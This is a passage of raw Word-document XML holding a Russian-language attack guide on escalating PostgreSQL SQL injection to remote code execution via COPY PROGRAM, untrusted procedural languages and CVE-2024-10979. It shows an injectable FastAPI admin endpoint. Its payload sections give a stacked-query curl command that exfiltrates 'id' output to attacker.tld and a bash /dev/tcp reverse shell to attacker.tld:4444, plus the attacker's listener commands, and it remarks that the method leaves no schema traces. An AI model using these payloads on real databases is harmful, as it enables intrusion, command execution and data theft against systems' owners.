        <w:t xml:space="preserve"> — sandbox trusted plperl до фикса позволял изменять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и через PATH-hijacking / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_PRELOAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> получать RCE. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Единственный путь без superuser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3.7.3 plpython3u и plsh (untrusted Python и shell)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — extension-функции с произвольным Python/bash. Аналогично plperlu — только superuser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сравнительная таблица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Путь</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Extension/функция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Расширение установлено по умолчанию</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Managed-доступность</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COPY PROGRAM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встроено в COPY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11+: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_execute_server_program</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> ИЛИ superuser; PG ≤10: только superuser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(встроено)</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нет</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — структурно недоступно на RDS / Cloud SQL / Supabase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3.7.2a plperlu</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EXTENSION plperlu</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superuser (CREATE EXTENSION + CREATE FUNCTION)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есть в contrib</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нет</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — untrusted-расширения не предоставляются</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 CVE-2024-10979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EXTENSION plperl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (trusted)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 CREATE на user-schema; до фикса 17.1/16.5/15.9/14.14/13.17/12.21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есть в contrib</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частично</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — plperl trusted иногда предоставляется (Cloud SQL да, RDS опционально), но патч там обычно накатан вовремя</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3.7.3 plpython3u / plsh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EXTENSION plpython3u</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plsh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superuser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plpython3u в contrib, plsh — отдельный пакет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нет</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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 `pg_read_server_files`, 3.6.4 `lo_export`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — file-read/write, не command execution. Цепочка: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web-shell → HTTP-запрос → RCE как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (см. саммари 3.6, перекрёстную ссылку в 3.7.3). Сам по себе file-write — не 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3.6.2 postgres_fdw SSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — SSRF к внутренним HTTP-endpoint, не command execution. Может </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">привести</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> к RCE через cloud metadata → IAM → cloud-side compromise, но это другой класс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методы получения superuser или predefined-role. Все пути 3.7.1 / 3.7.2a / 3.7.3 требуют такого pre-flight; 3.13 описывает как до них добраться.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cron-extensions (`pg_cron`, `pgagent`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — могут запустить SQL по расписанию, но сами по себе не дают command execution; используются как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">обвес</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> к 3.7.1/3.7.2a/3.7.3 для отсроченного запуска. Кратко упоминаются в саммари 3.7.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> COPY FROM/TO PROGRAM (R3) — три payload: one-shot exfil, reverse-shell, chain CVE-2025-1094 → COPY (R6 → R3)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3.7.2a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> plperlu untrusted (R7) — путь от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3.7.2b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE-2024-10979 в plperl trusted (R7) — путь от PUBLIC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3.7.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> plpython3u + plsh (упоминание plr / plv8)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.7.1 COPY FROM/TO PROGRAM</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COPY ... FROM PROGRAM 'cmd'</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COPY ... TO PROGRAM 'cmd'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — серверные формы команды COPY, которые исполняют shell-команду на хосте через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">popen()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FROM PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> берёт stdout команды как входные данные для таблицы; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> отправляет результаты SELECT на stdin команды. В контексте инъекции — превращает SQL-execution в произвольное исполнение OS-команд под пользователем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Это серверная фича PostgreSQL (не баг), внесена в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> начиная с PG 9.3 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM PROGRAM</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TO PROGRAM</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app/api/admin/reports.py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get_admin_session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@router.get("/admin/table-stats")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def table_stats(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    table: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Depends(get_admin_session),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admin-роль в БД имеет pg_execute_server_program</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # (выдано для backup-скриптов и COPY-экспортов)</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count(*), pg_table_size('{table}') FROM {table}")</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result.one()</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table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> напрямую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 использование admin-сессии с выданным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 достаточные условия для эскалации до RCE при наличии stacked queries в драйвере (см. 3.5).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — one-shot эксфильтрация через TO PROGRAM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Минимальный RCE-проб: исполнить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, передать вывод через base64 в URL атакующего.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (подставляется вместо `table`):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">users; COPY (SELECT '') TO PROGRAM 'curl https://attacker.tld/$(id|base64 -w0)' --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">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SELECT count(*), pg_table_size('users; COPY (SELECT '') TO PROGRAM 'curl https://attacker.tld/$(id|base64 -w0)' --') FROM users; COPY (SELECT '') TO PROGRAM 'curl https://attacker.tld/$(id|base64 -w0)' --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Через стакинг исполняются две команды: первый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падает с ошибкой (некорректный аргумент в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_table_size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), но это уже не важно — вторая команда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY (SELECT '') TO PROGRAM 'curl ...'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> запускает curl на сервере. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$(id|base64 -w0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> интерполируется bash-ом до выполнения curl, в URL уходит base64 от вывода </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">id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На стороне атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># или быстрее — Burp Collaborator / interactsh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — reverse-shell через FROM PROGRAM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Полноценный интерактивный shell под пользователем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Payload (подставляется вместо `table`):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">users; CREATE TEMP TABLE _x(x text); COPY _x FROM PROGRAM 'bash -c "bash -i &gt;&amp; /dev/tcp/attacker.tld/4444 0&gt;&amp;1"' --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">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SELECT count(*), pg_table_size('...payload...') FROM users; CREATE TEMP TABLE _x(x text); COPY _x FROM PROGRAM 'bash -c "bash -i &gt;&amp; /dev/tcp/attacker.tld/4444 0&gt;&amp;1"' --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE TEMP TABLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> нужен потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY tablename FROM PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> требует существующую таблицу (в отличие от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY (SELECT...) TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). TEMP-таблица исчезнет в конце сессии — никаких следов в схеме.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">На стороне атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
